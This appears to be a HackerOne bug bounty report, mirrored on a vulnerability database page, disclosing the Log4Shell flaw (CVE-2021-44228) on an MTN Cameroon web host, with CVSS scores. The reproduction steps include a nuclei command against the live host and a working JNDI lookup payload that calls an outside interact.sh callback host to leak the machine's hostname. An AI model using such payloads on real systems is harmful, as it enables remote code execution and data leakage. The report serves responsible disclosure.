Lucene search

K
hackeroneRenziH1:1425563
HistoryDec 14, 2021 - 3:55 a.m.

MTN Group: Remote code injection in Log4j on http://mtn1app.mtncameroon.net - CVE-2021-44228

2021-12-1403:55:04
renzi
hackerone.com
11
mtn group
log4j
remote code injection
cve-2021-44228
nuclei script
command execution
hostname retrieval
http
https
port 8080
port 8443
vulnerability
vendor update
technical reference
tenable
elastic
bug bounty

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

CVSS3

10

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score

8.2

Confidence

High

EPSS

0.968

Percentile

99.7%

###Summary
Hello,

I would to like report this security flaw on http://mtn1app.mtncameroon.net . Using script nuclei i can found CVE-2021-44228. This is a critical issue cause as remote command execution. On my test i just retrive hostname of machine via nuclei script. (https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)

###Steps To Reproduce
How we can reproduce the issue;

  1. run nuclei script via cmd; ./nuclei -u http://mtn1app.mtncameroon.net:8080/ -t …/nuclei-templates/cves/2021/CVE-2021-44228.yaml

It will retrive the hostname of machine on output " lastic-co1-nodes1.mtnnigeria.net"

Like this;

http://mtn1app.mtncameroon.net:8080/?x=${jndi:ldap://${hostName}.c6s11oscca8f9pc2lrggcghbnjyyyybjg.interact.sh/a} [lastic-co1-nodes1.mtnnigeria.net]

This vulnerability is on port 8080 and 8443;

###Mitigation
Update according the vendor and thecnical references…

###References
https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability
https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476

Impact

Remote command execution

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

CVSS3

10

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score

8.2

Confidence

High

EPSS

0.968

Percentile

99.7%